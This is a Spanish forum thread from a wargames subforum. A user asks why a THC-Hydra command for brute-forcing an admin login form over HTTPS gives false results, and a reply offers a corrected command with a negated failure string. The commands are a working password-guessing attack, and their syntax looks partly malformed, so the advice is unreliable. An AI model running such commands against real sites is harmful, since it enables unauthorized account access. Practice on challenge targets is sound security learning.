elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a Git (Primera Parte)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Seguridad
| | |-+  Desafíos - Wargames (Moderador: Kasswed)
| | | |-+  Problema con Hydra
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Problema con Hydra  (Leído 5,056 veces)
juanky

Desconectado Desconectado

Mensajes: 1


Ver Perfil
Problema con Hydra
« en: 14 Marzo 2023, 20:38 pm »

Buenas.

tengo un problema con hydra y es que no se muy bien como seria la condición que tengo que poner para ver si es falsa la condición. Me gustaría que me echarais una mano.


hydra -s 443 -l admin -P /home/juanky/Escritorio/diccionario https-post-form "/admin-panel/login:login=^USER^&password=^PASS^Login:login failed" -vV -f

Ese es el comando que yo pongo pero no me va me encuentra otras contraseñas

Y el codigo de la web es el siguiente:

<h2 style="text-align:center;">You've been 0wn3d!! Please, identify yourself</h2>
<div align="center">
            <form action="login" method="post">
                Login: <input type="text" name="login"/> <br /><br>
                Contraseña: <input type="text" name="password"/> <br /><br>
                <br>
                <input type="submit" Login/>
            </form>
</div>
</center>
        </body></html>

Un saludo y gracias de antemano.


En línea

LlopoRobot

Desconectado Desconectado

Mensajes: 116


Un instante, una mente al unísono


Ver Perfil
Re: Problema con Hydra
« Respuesta #1 en: 1 Abril 2023, 08:17 am »

Para indicar que una condición es falsa en Hydra, se utiliza el signo de exclamación (!) antes de la condición. En tu caso, la condición para verificar que el inicio de sesión falló es la siguiente: "login failed". Entonces, para indicar que la condición es falsa y, por lo tanto, exitosa, debes agregar el signo de exclamación antes de "login failed". Así que el comando debería ser así:

Código:
hydra -s 443 -l admin -P /home/juanky/Escritorio/diccionario https-post-form "/admin-panel/login:login=^USER^&password=^PASS^Login:!login failed" -vV -f

Con esta modificación, Hydra buscará contraseñas hasta que encuentre una que haga que la cadena "login failed" no aparezca en la respuesta.


En línea

I'm woman baby. Can't you tell?
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Problema con Hydra
Hacking
Pyr0s 6 6,092 Último mensaje 10 Diciembre 2009, 18:32 pm
por Pyr0s
Consulta de problema con thc-hydra
Hacking
el_telita22 0 2,129 Último mensaje 6 Agosto 2012, 06:16 am
por el_telita22
Problema hack http-post-form con Hydra
Hacking
myproductionsg 3 3,009 Último mensaje 14 Octubre 2013, 22:06 pm
por x0bs
Hydra
Hacking
Hitma_19 2 3,079 Último mensaje 29 Enero 2017, 10:51 am
por 3lyatmaN
Problema con Hydra
Hacking
TryHarder 0 1,539 Último mensaje 30 Junio 2022, 12:33 pm
por TryHarder
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines